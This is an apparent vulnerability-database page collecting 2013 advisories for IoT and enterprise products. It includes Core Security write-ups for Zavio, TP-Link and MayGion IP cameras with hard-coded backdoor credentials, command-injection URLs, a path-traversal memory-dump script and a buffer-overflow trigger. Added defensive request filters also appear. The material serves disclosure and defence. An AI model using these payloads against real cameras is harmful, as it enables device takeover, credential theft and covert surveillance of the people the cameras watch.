VARIoT IoT vulnerabilities database


VAR-201305-0365 No CVE SAP NetWeaver Gateway SAP Client Enumeration Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
SAP NetWeaver Gateway lets developers access SAP software from any environment or device for solution development. Because SAP NetWeaver Gateway does not properly restrict arbitrary RFC requests, a remote attacker can enumerate valid SAP client numbers. Client numbers range from 000 to 999, so the whole space can be covered by brute force.
VAR-201305-0499 No CVE Sony PlayStation 3 File Handling Local Command Execution Vulnerability CVSS V2: 4.4
CVSS V3: -
Severity: MEDIUM
The PlayStation 3 is a home game console developed by Sony Computer Entertainment. A vulnerability in the PlayStation 3 allows a local attacker to craft a malicious SFO file and execute arbitrary system commands when the file is processed during a save operation.
VAR-201305-0363 No CVE SAP NetWeaver Gateway Account Brute Force Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
SAP NetWeaver Gateway lets developers access SAP software from any environment or device for solution development. The account locking mechanism that SAP NetWeaver Gateway uses to protect against brute force attacks is flawed: the lock counter is reset at a predictable time, 00:01 by default, so a remote attacker can run brute force attempts between the end of the working day and midnight, after which the counters are cleared and the attack is unlikely to be noticed immediately.
VAR-201305-0364 No CVE SAP NetWeaver Gateway RFC_ABAP_INSTALL_AND_RUN RFC Arbitrary command execution vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
SAP NetWeaver Gateway lets developers access SAP software from any environment or device for solution development. The RFC_ABAP_INSTALL_AND_RUN function module exposed through SAP NetWeaver Gateway executes ABAP source code passed to it line by line, which allows an authenticated remote attacker to execute arbitrary commands by calling the RFC.
VAR-201305-0119 CVE-2013-1246 Cisco TelePresence System Software denial of service (DoS) vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
Cisco TelePresence System Software does not properly handle inactive t-shell sessions, which allows remote authenticated users to cause a denial of service (memory consumption and service outage) by establishing multiple SSH connections, aka Bug ID CSCug77610. Cisco TelePresence System is prone to a remote denial-of-service vulnerability; successfully exploiting this issue allows remote authenticated attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCug77610. Cisco TelePresence is Cisco's family of video conferencing solutions; it provides audio and video components that give remote participants the effect of a face-to-face virtual meeting room.
VAR-201305-0148 CVE-2013-1208 Cisco NX-OS on Cisco Nexus 1000V vulnerable to interception or modification of network traffic CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
The encryption functionality in Cisco NX-OS on the Nexus 1000V does not properly handle Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication, which allows remote attackers to intercept or modify network traffic by leveraging certain Layer 2 or Layer 3 access, aka Bug ID CSCud14691. The vendor tracks this vulnerability as Bug ID CSCud14691. A third party with Layer 2 or Layer 3 access may intercept or alter network traffic. The Cisco Nexus Series switches are data center switches running the Cisco NX-OS operating system. Successful exploits allow attackers to perform unauthorized actions and obtain sensitive information that may aid in further attacks.
VAR-201305-0150 CVE-2013-1210 Cisco NX-OS on Cisco Nexus 1000V denial of service (DoS) vulnerability CVSS V2: 5.4
CVSS V3: -
Severity: MEDIUM
Array index error in the Virtual Ethernet Module (VEM) kernel driver for VMware ESXi in Cisco NX-OS on the Nexus 1000V, when STUN debugging is enabled, allows remote attackers to cause a denial of service (ESXi crash and purple screen of death) by sending crafted STUN packets to a VEM, aka Bug ID CSCud14825. A crafted STUN message sent to the VEM crashes the ESXi hypervisor. The Cisco Nexus Series switches are data center switches running the Cisco NX-OS operating system. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCud14825.
VAR-201305-0151 CVE-2013-1211 Cisco NX-OS on Cisco Nexus 1000V VEM access vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco NX-OS on the Nexus 1000V does not properly handle authentication for Virtual Ethernet Module (VEM) to Virtual Supervisor Module (VSM) communication, which allows remote attackers to obtain VEM access via (1) spoofed STUN packets or (2) a crafted VMware ESXi instance, aka Bug ID CSCud14832. The vendor tracks this vulnerability as Bug ID CSCud14832. A third party may gain access to the VEM through (1) spoofed STUN packets or (2) a specially crafted VMware ESXi instance. The Cisco Nexus Series switches are data center switches running the Cisco NX-OS operating system. Remote attackers can exploit this issue to bypass the authentication mechanism and gain unauthorized access to an affected device, which may aid in further attacks.
VAR-201305-0152 CVE-2013-1212 Cisco NX-OS on Cisco Nexus 1000V vulnerable to server spoofing CVSS V2: 5.8
CVSS V3: -
Severity: MEDIUM
The SSL functionality in Cisco NX-OS on the Nexus 1000V does not properly verify X.509 certificates, which allows man-in-the-middle attackers to spoof servers, and intercept or modify Virtual Supervisor Module (VSM) to VMware vCenter communication, via a crafted certificate, aka Bug ID CSCud14837. Cisco NX-OS is Cisco's data center operating system, used on the Cisco Nexus Series data center switches. An attacker can exploit this issue to perform man-in-the-middle attacks and certain unauthorized actions, which may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCud14837.
VAR-201305-0153 CVE-2013-1213 Cisco NX-OS on Cisco Nexus 1000V denial of service (DoS) vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Cisco NX-OS on the Nexus 1000V does not assign the proper priority to heartbeat messages from a Virtual Ethernet Module (VEM) to a Virtual Supervisor Module (VSM), which allows remote attackers to cause a denial of service (false VEM unavailability report) via a flood of UDP packets, aka Bug ID CSCud14840. The vendor tracks this vulnerability as Bug ID CSCud14840. A flood of UDP packets from a third party can prevent heartbeat delivery, so the VSM falsely reports the affected VEM as unavailable, causing a denial of service. The Cisco Nexus Series switches are data center switches running the Cisco NX-OS operating system. Successfully exploiting this issue allows remote attackers to cause denial-of-service conditions.
VAR-201305-0468 No CVE YeaLink IP Phone SIP-T20P/SIP-T26P Security Bypass Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
YeaLink IP Phone SIP-T20P and SIP-T26P devices with firmware version <= 9.70.0.100 contain a vulnerability that allows an attacker to make the phone place a call from the first available SIP account without user confirmation, after which the remote party can listen through the phone's microphone. YeaLink IP Phone SIP-T20P and SIP-T26P are enterprise-grade IP phones from YeaLink of China. The SIP-T20P is designed for easy installation, use and management and is aimed at SMEs, call centers, government and industry users. The SIP-T26P supports VLAN and OpenVPN and is suited to professional users such as supervisors, receptionists, dispatchers and agents. A security bypass vulnerability exists in YeaLink IP Phone SIP-T20P and SIP-T26P; an attacker could use it to bypass specific security restrictions and perform unauthorized operations.
VAR-201305-0490 No CVE TP-LINK TL-WR842ND Directory Traversal Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
TP-LINK TL-WR842ND is a wireless router made by TP-LINK of China. A directory traversal vulnerability exists in the TP-LINK TL-WR842ND; a remote attacker could use it to obtain sensitive information that can help launch further attacks. The vulnerability is present in firmware version 3.12.22 Build 120424 Rel.39632n; other versions may also be affected.
VAR-202001-0852 CVE-2013-2570 Zavio IP camera OS command injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201305-0003
CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 in the General.Time.NTP.Server parameter to the sub_C8C8 function of the binary /opt/cgi/view/param, which could let a remote malicious user execute arbitrary code. Zavio IP cameras contain an OS command injection vulnerability; information disclosure, tampering and denial of service (DoS) are possible. Zavio IP Cameras are prone to a command-injection vulnerability. Exploiting this issue could allow an attacker to execute arbitrary commands in the context of the affected device. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable.

1. *Advisory Information*
Title: Zavio IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0302
Advisory URL: http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: Zavio
Release mode: User release

2. *Vulnerability Information*
Class: Use of hard-coded credentials [CWE-798], OS command injection [CWE-78], Incorrect default permissions [CWE-276], OS command injection [CWE-78]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-2567, CVE-2013-2568, CVE-2013-2569, CVE-2013-2570

3. *Vulnerability Description*
Multiple vulnerabilities have been found in Zavio IP cameras based on firmware v1.6.03 and below, that could allow an unauthenticated remote attacker:
   1. [CVE-2013-2567] to bypass user web interface authentication using hard-coded credentials.
   2. This flaw can also be used to obtain all credentials of registered users.
   3. [CVE-2013-2569] to access the camera video stream.
   4.

4. *Vulnerable Packages*
   .

5. *Non-Vulnerable Packages*
   . Vendor did not provide details. Contact Zavio for further information.

6. *Vendor Information, Solutions and Workarounds*
There was no official answer from Zavio after several attempts to report these vulnerabilities (see [Sec. 9]). Contact vendor for further information. Some mitigation actions may be:
   . Do not expose the camera to Internet unless absolutely necessary.
   . Enable RTSP authentication.
   . Have at least one proxy filtering HTTP requests to 'manufacture.cgi' and 'wireless_mft.cgi'.
   . Check the parameter 'General.Time.NTP.Server' in requests to '/opt/cgi/view/param'.

7. *Credits*
These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

8. *Technical Description / Proof of Concept Code*

8.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2567]
Zavio IP cameras use the Boa web server [3], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside:

/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/

This account is not visible from the user web interface; users are not aware of its existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/':
   1. 'manufacture.cgi'
   2. 'wireless_mft.cgi'
The last file contains the OS command injection shown in the following section.

8.2. *OS Command Injection* [CVE-2013-2568]
The file '/cgi-bin/mft/wireless_mft.cgi' has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials shown in the previous section:

/-----
username: manufacture
password: erutcafunam
-----/

The following proof of concept copies the file where the user credentials are stored into the web server root directory:

/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/

Afterwards, the user credentials can be obtained by requesting:

/-----
http://192.168.1.100/credenciales
-----/

8.3. *RTSP Authentication Disabled by Default* [CVE-2013-2569]
The RTSP protocol authentication is disabled by default. Therefore, the live video stream can be accessed by a remote unauthenticated attacker by requesting:

/-----
rtsp://192.168.1.100/video.h264
-----/

8.4. *OS Command Injection (Post-auth)* [CVE-2013-2570]
The command injection is located in the function 'sub_C8C8' of the binary '/opt/cgi/view/param'. The vulnerable parameter is 'General.Time.NTP.Server'. The following proof of concept can be used to obtain the complete list of access points by executing '/sbin/awpriv ra0 get_site_survey':

/-----
http://192.168.1.100/cgi-bin/admin/param?action=update&General.Time.DateFormat=ymd&General.Time.SyncSource=NTP&General.Time.TimeZone=GMT-06:00/America/Mexico_City&General.Time.NTP.ServerAuto=no&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;&General.Time.NTP.Update=01:00:00&General.Time.DayLightSaving.Enabled=on&General.Time.DayLightSaving.Start.Type=date&General.Time.DayLightSaving.Stop.Type=date&General.Time.DayLightSaving.Start.Month=01&General.Time.DayLightSaving.Stop.Month=01&General.Time.DayLightSaving.Start.Week=1&General.Time.DayLightSaving.Stop.Week=1&General.Time.DayLightSaving.Start.Day=01&General.Time.DayLightSaving.Stop.Day=01&General.Time.DayLightSaving.Start.Date=01&General.Time.DayLightSaving.Stop.Date=01&General.Time.DayLightSaving.Start.Hour=00&General.Time.DayLightSaving.Stop.Hour=00&General.Time.DayLightSaving.Start.Min=00&General.Time.DayLightSaving.Stop.Min=00&Image.OSD.Enabled=off
-----/

9. *Report Timeline*
   . 2013-03-19: Core Security Technologies notifies the Zavio Tech Support and requests a security manager to send a draft report regarding these vulnerabilities. No reply received.
   . 2013-05-02: Core asks Zavio Tech Support for a security manager to send a confidential report.
   . 2013-05-09: Core asks for a reply.
   . 2013-05-14: Core asks for a reply.
   . 2013-05-21: Core tries to contact vendor for last time without any reply.
   . 2013-05-28: After 5 failed attempts to report the issues, the advisory CORE-2013-0302 is published as 'user-release'.

10. *References*
[1] http://www.zavio.com/product.php?id=25
[2] http://zavio.com/product.php?id=23
[3] http://www.boa.org/

11. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

13. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
VAR-202001-0855 CVE-2013-2573 Multiple TP-Link IP camera products OS command injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201305-0137
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A Command Injection vulnerability exists in the ap parameter to the /cgi-bin/mft/wireless_mft.cgi file in TP-Link IP Cameras TL-SC 3130, TL-SC 3130G, TL-SC 3171G and TL-SC 4171G 1.6.18P12s, which could let a malicious user execute arbitrary code. Multiple TP-Link IP camera products contain an OS command injection vulnerability; information disclosure, tampering and denial of service (DoS) are possible. TP-LINK IP Cameras are network camera products. A remote attacker can bypass authentication on the affected product using a hard-coded username and password (see CVE-2013-2572) and then use this command injection vulnerability to execute arbitrary commands through the administrative web interface.

1. *Advisory Information*
Title: TP-Link IP Cameras Multiple Vulnerabilities
Advisory ID: CORE-2013-0318
Advisory URL: http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: TP-Link
Release mode: Coordinated release

2. *Vulnerability Description*
Multiple vulnerabilities have been found in TP-Link IP cameras based on firmware v1.6.18P12 and below, that could allow an unauthenticated remote attacker:
   1. [CVE-2013-2572] to bypass user web interface authentication using hard-coded credentials.
   2. This flaw can also be used to obtain all credentials of registered users.

4. *Vulnerable Packages*
   Tests and PoC were run on:
   . TL-SC 3130 [CVE-2013-2572] works with this device only
   . TL-SC 3130G
   . TL-SC 3171G
   .

5. *Vendor Information, Solutions and Workarounds*
Vendor provides the links to patched firmware versions. This software is *beta*; TP-Link will release the final versions with release notes and some new functions and fixes in the following days.
   . http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip
   . http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip

6. *Credits*
These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Hard-Coded Credentials in Administrative Web Interface* [CVE-2013-2572]
TP-Link IP cameras use the Boa web server [1], a popular tiny server for embedded Linux devices. 'boa.conf' is the Boa configuration file, and the following account can be found inside:

/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/

This account is not visible from the user web interface; users are not aware of its existence and cannot eliminate it. Through this account it is possible to access two CGI files located in '/cgi-bin/mft/':
   1. 'manufacture.cgi'
   2. 'wireless_mft.cgi'

7.2. *OS Command Injection in wireless_mft.cgi* [CVE-2013-2573]
The file '/cgi-bin/mft/wireless_mft.cgi' has an OS command injection in the parameter 'ap' that can be exploited using the hard-coded credentials shown in the previous section:

/-----
username: manufacture
password: erutcafunam
-----/

The following proof of concept copies the file where the user credentials are stored into the web server root directory:

/-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/

Afterwards, the user credentials can be obtained by requesting:

/-----
http://192.168.1.100/credenciales
-----/

8. *Report Timeline*
   . 2013-04-29: Core Security Technologies notifies the TP-Link Customer Support of the vulnerabilities. Publication date is set for May 28th, 2013.
   . 2013-04-30: TP-Link team asks for a report with technical information.
   . 2013-05-02: Technical details sent to TP-Link.
   . 2013-05-12: Vendor notifies that a new firmware will be released around May 20th.
   . 2013-05-16: Core asks vendor if they are ready for coordinated public disclosure on May 20th.
   . 2013-05-17: Vendor notifies that they have fixed the firmware but the testing process won't be ready before May 24th.
   . 2013-05-20: Core notifies that the advisory publication was re-scheduled for Monday 27th.
   . 2013-05-23: Vendor sends a copy of the beta firmware in order to confirm if issues were fixed.
   . 2013-05-27: Vendor notifies that consumers are able to download the Beta firmware from TP-Link website. The final release will be made public in the following days, and will add some new functions.
   . 2013-05-28: Advisory CORE-2013-0318 published.

9. *References*
[1] http://www.boa.org/

10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. *Disclaimer*
The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
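The Zavio advisory (CORE-2013-0302, section 6) recommends a proxy that filters requests to 'manufacture.cgi' and 'wireless_mft.cgi' and checks 'General.Time.NTP.Server'; the same 'ap' parameter injection appears in the TP-Link advisory (CORE-2013-0318, section 7.2). The Python below is an added example of such a filter, not code from either advisory, from Core Security, or from either vendor. The CGI paths, the parameter name and the sample requests are taken from the advisories' PoC URLs; the hostname character set used to validate the NTP server value, and the way the filter is wired into a proxy, are assumptions. It also includes a small boa.conf audit that finds the MFT directive.

```python
"""Added example: request filter for the workaround in CORE-2013-0302 /
CORE-2013-0318.  Blocks the manufacturer CGIs reachable through the hidden
'manufacture' account and rejects a General.Time.NTP.Server value that is
not a plain hostname or IP literal.  Not vendor or Core Security code."""
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# The two CGIs behind the hard-coded MFT account (advisory section 8.1).  The
# PoC calls wireless_mft without the .cgi suffix, so accept the name either way.
BLOCKED_CGI = re.compile(r"^/cgi-bin/mft/(manufacture|wireless_mft)(\.cgi)?$", re.I)

# Assumption: a legitimate NTP server is a hostname or IPv4/IPv6 literal, so
# letters, digits, dots, hyphens and colons only.  ';', '!', '/', space and
# every other shell metacharacter are rejected.
NTP_SERVER_OK = re.compile(r"^[A-Za-z0-9.\-:]{1,253}$")

PARAM_PATH = "/cgi-bin/admin/param"   # URL that runs /opt/cgi/view/param (PoC 8.4)
NTP_PARAM = "General.Time.NTP.Server"


def classify_request(request_target: str) -> Tuple[str, str]:
    """Decide one HTTP request target (path plus query, as on the request
    line).  Returns ("block", reason) or ("allow", "")."""
    parts = urlsplit(request_target)
    path = unquote(parts.path)          # decode %77 etc. before matching
    if BLOCKED_CGI.match(path):
        return "block", "manufacturer CGI %s must not be reachable" % path
    if path.lower() == PARAM_PATH:
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get(NTP_PARAM, []):
            if not NTP_SERVER_OK.match(value):
                return "block", "%s is not a hostname: %r" % (NTP_PARAM, value)
    return "allow", ""


def find_mft_accounts(boa_conf: str) -> List[Tuple[str, str]]:
    """Firmware audit: return (user, password) pairs from 'MFT user pass'
    directives in a boa.conf, the line that defines the hidden account."""
    found = []
    for line in boa_conf.splitlines():
        fields = line.split()
        if len(fields) >= 3 and fields[0] == "MFT":
            found.append((fields[1], fields[2]))
    return found


# Constructed sample input: the two PoC request targets from the advisories,
# a benign time-settings update, and the boa.conf excerpt the advisory quotes.
SAMPLE_REQUESTS = [
    "/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales",
    "/cgi-bin/admin/param?action=update&General.Time.SyncSource=NTP"
    "&General.Time.NTP.Server=sarasa!de!palermo;/sbin/awpriv%20ra0%20get_site_survey;",
    "/cgi-bin/admin/param?action=update&General.Time.SyncSource=NTP"
    "&General.Time.NTP.Server=pool.ntp.org",
]
SAMPLE_BOA_CONF = (
    "# MFT: Specify manufacture commands user name and password\n"
    "MFT manufacture erutcafunam\n"
)

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        verdict, reason = classify_request(target)
        print(verdict, target.split("?")[0], reason)
    print("hidden accounts:", find_mft_accounts(SAMPLE_BOA_CONF))
```

The filter only prevents the two injections from being reached; it does nothing for the RTSP stream, and once 'secret.passwd' has been copied into the web root it will not stop a plain GET for '/credenciales'. Blocking the CGI by path rather than by credentials is deliberate: the 'manufacture' account cannot be removed from the camera, so the only place to cut it off is in front of the device.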
VAR-202001-0850 CVE-2013-2568 Zavio IP camera OS command injection vulnerability

Related entries in the VARIoT exploits database: VAR-E-201305-0003
CVSS V2: 10.0
CVSS V3: 9.8
Severity: CRITICAL
A Command Injection vulnerability exists in Zavio IP Cameras through 1.6.3 via the ap parameter to /cgi-bin/mft/wireless_mft.cgi, which could let a remote malicious user execute arbitrary code. Zavio IP cameras contain an OS command injection vulnerability; information disclosure, tampering and denial of service (DoS) are possible. Zavio is an IP camera vendor. This vulnerability can also be used to obtain credentials for all registered users. Zavio IP Cameras are prone to a remote arbitrary command-injection vulnerability. Successful exploits will allow attackers to execute arbitrary commands in the context of the affected application. This may further aid in other attacks. Zavio IP Cameras running firmware version 1.6.03 and below are vulnerable. The full Core Security advisory CORE-2013-0302, whose sections 8.1 and 8.2 cover the hard-coded 'manufacture' account and the 'ap' parameter injection in '/cgi-bin/mft/wireless_mft.cgi', is reproduced under VAR-202001-0852 above.
VAR-201305-0149 CVE-2013-1209 Cisco NX-OS on Cisco Nexus 1000V vulnerable to packet-level encryption and integrity protection being disabled CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The encryption functionality in the Virtual Supervisor Module (VSM) to Virtual Ethernet Module (VEM) communication component in Cisco NX-OS on the Nexus 1000V does not properly authenticate VSM/VEM packets, which allows remote attackers to disable packet-level encryption and integrity protection via crafted packets, aka Bug ID CSCud14710. The Cisco Nexus series switches are data center switches running the Cisco NX-OS operating system. Because the software does not properly validate VSM/VEM packets, an attacker can exploit this issue to bypass the authentication mechanism, disable packet-level encryption and integrity protection for VSM/VEM traffic, and perform unauthorized actions on the affected device. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCud14710.
VAR-201403-0054 CVE-2013-1604 MayGion IP Camera Directory traversal vulnerability in some firmware CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Directory traversal vulnerability in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI. MayGion IP Camera is prone to a directory-traversal vulnerability. An attacker can exploit this issue using directory-traversal strings to retrieve arbitrary files outside of the server root directory. This may aid in further attacks.

Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

MayGion IP Cameras multiple vulnerabilities

1. *Advisory Information*

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. *Vulnerability Description*

The vulnerabilities allow an unauthenticated remote attacker:

1. [CVE-2013-1604] to dump the camera's memory and retrieve user credentials,
2. [CVE-2013-1605] to execute arbitrary code.

4. *Vulnerable Packages*

. MayGion IP cameras based on firmware 2011.27.09.
. Other firmware versions are probably affected too but they were not checked.

5. *Non-Vulnerable Packages*

. H.264 ipcam firmware 2013.04.22.

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and Francisco Falcon from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

7.1. *User Credentials Leaked via Path Traversal* [CVE-2013-1604]

The following Python code exploits a path traversal and dumps the camera's memory. Valid user credentials can be extracted from this memory dump by an unauthenticated remote attacker. The request walks out of the web server's document root with '..' components and reads '/proc/kcore', the kernel's image of system memory; the server neither normalises the path nor checks that the resolved file still lies under its root.

/-----
# Python 2 httplib (the module is http.client in Python 3)
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
# nine '..' components climb from the document root to '/', then into /proc
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()   # memory image; search it for credential strings
conn.close()
-----/

7.2. *Buffer overflow* [CVE-2013-1605]

The following Python script can be used to trigger the vulnerability without authentication. As a result, the Instruction Pointer register (IP) will be overwritten with 0x61616161, which is a typical buffer overrun condition. 0x61616161 is four 'a' (0x61) bytes; the script as published sends uppercase 'A' (0x41) bytes, for which the register would read 0x41414141. Either way, bytes from the requested filename end up in the instruction pointer, which is what makes the overflow usable for code execution.

/-----
# Python 2 httplib (the module is http.client in Python 3)
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
# a 3000-byte filename overruns the fixed-size buffer holding the request path
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()   # raises a connection error if the server process crashed
data = resp.read()
conn.close()
-----/

8. *Report Timeline*

. 2013-05-02: Core Security Technologies notifies MayGion of the vulnerabilities. Publication date is set for May 29th, 2013.
. 2013-05-02: Vendor asks for a report with technical information.
. 2013-05-03: A draft advisory containing technical details is sent to the MayGion team.
. 2013-05-03: Vendor notifies that all vulnerabilities were fixed in the latest firmware version, released April 22nd, 2013.
. 2013-05-09: Core asks for a list of affected devices and firmware. No reply received.
. 2013-05-28: Advisory CORE-2013-0322 is published.

9. *References*

[1] http://www.maygion.com
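The server-side check the camera lacks, as an added example that is neither the advisory's code nor MayGion's firmware: a request-target is percent-decoded, normalised and served only if it still resolves under the document root, so the raw '..' sequence of the PoC above, its percent-encoded variants and NUL-truncation attempts are all refused. The document root '/var/www' and the sample request paths are assumptions made for the example.

```python
"""Hardened request-path resolution for an embedded web server.

Added example; not code from the MayGion firmware or the Core advisory.
The document root and the sample request paths below are assumptions.
"""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www"  # assumed document root for the example


def resolve_under_root(request_target, root=DOC_ROOT):
    """Map an HTTP request-target to a filesystem path under `root`.

    Returns the absolute path to serve, or None when the request must be
    refused: a NUL byte (which would truncate a C string on the device) or
    a path that, after decoding and normalisation, leaves the root.
    """
    # Only the path component selects a file; drop query and fragment.
    path = request_target.split("?", 1)[0].split("#", 1)[0]
    # Decode before normalising, otherwise '%2e%2e' is never seen as '..'.
    path = unquote(path)
    if "\x00" in path:
        return None
    # Join as a *relative* path so that leading '..' components survive
    # normalisation and show up as an escape from the root.
    full = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def classify(request_target, root=DOC_ROOT):
    """Human-readable verdict, handy when replaying captured requests."""
    resolved = resolve_under_root(request_target, root)
    return "refused" if resolved is None else "serve " + resolved


# Constructed sample requests: the advisory's PoC plus encoded variants.
SAMPLE_REQUESTS = [
    "/index.html",
    "/images/../index.html?cam=1",
    "/../../../../../../../../../proc/kcore",    # CVE-2013-1604 PoC
    "/%2e%2e/%2e%2e/%2e%2e/proc/kcore",          # percent-encoded dots
    "/cgi-bin/..%2f..%2fetc/passwd",             # percent-encoded slashes
    "/a%00.html",                                # NUL truncation attempt
]

if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print("%-45s -> %s" % (target, classify(target)))
```

Decoding first and containing second is the order that matters: a check on the raw string would pass '%2e%2e', and a check that normalises an absolute path ('/' + path) silently folds the leading '..' components away instead of reporting the escape.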
VAR-201403-0055 CVE-2013-1605 MayGion IP Camera firmware buffer overflow vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
